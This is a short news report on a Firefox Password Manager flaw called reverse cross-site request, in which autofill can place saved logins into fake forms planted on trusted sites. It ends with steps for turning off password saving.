New security vulnerability in the second most popular web browser Mozilla Firefox has been discovered yesterday. It is called a reverse cross-site request, or RCSR, flaw. It can be exploited in order to steal user confidential information (passwords, login names, personal details) stored in the Firefox Password Manager.
Usually, when the user visits a web site that he has saved login information for, the Firefox Password Manager automatically fills in the login name and password to web forms. Then the user only has to press the Submit button. This allows logging in instantly without having to enter necessary information every time such a web site is accessed.
However, Firefox does not check the address of a web page it enters confidential user information to, and simply fills in the forms. It’s OK when a page is safe, but the attacker can create a fake login form on a trusted web site and easily steal the information.
Working exploits have already been seen on the popular social-networking site MySpace. Similar exploits might be hosted in blogs, forums or other sites that allow users to add own HTML code. Phishers might also be interested in utilizing the new flaw.
Mozilla developers are aware of the RCSR vulnerability. However, there is no patch yet.
It must be noted that Firefox rival Microsoft Internet Explorer 7 might also be vulnerable. It includes the functionality to save passwords and login names, and also does not check the address of a web page properly. However, usually, Internet Explorer does not automatically fill in login details like Firefox does.
Both current branches of Mozilla Firefox (1.x and 2 releases) are vulnerable. Uses are advised to stop using the Firefox Password Manager and login manually.
To disable the Password Manager, navigate to Tools > Options… > Security and uncheck the Remember passwords for sites option. Press OK. Please note that this will remove all your saved passwords and login names, so make sure to write them down first.